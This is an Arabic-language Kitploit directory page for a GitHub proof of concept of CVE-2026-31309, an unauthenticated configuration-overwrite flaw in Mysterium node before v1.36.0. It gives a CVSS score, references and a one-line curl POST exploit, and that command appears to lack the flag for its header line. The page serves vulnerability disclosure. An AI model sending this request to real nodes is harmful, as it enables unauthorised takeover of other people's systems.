Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31309 — التحكم غير السليم في الوصول في عقدة Mysterium قبل الإصدار v1.36.0 | Kitploit
أدوات/GitHubGitHub/sch8ill/cve-2026-31309
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

التحكم غير السليم في الوصول في عقدة Mysterium قبل الإصدار v1.36.0

عرض المستودعالموقع الإلكتروني
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31309: التحكم في الوصول غير الصحيح في عقدة Mysterium قبل الإصدار 1.36.0

يسمح التفويض غير الصحيح في نقطة النهاية /tequilapi/config/user لعقدة Mysterium من الإصدار v1.21.1-rc0 قبل الإصدار v1.36.0 لمهاجم غير مصادق بتجاوز تكوين العقدة بشكل عشوائي وتحقيق سيطرة كاملة عليها عبر طلب POST مصمم خصيصًا.

CVSS

الدرجة: 9.8 (حرجة)

المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

اكتشفه Till Schacht.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
تنزيل الأداة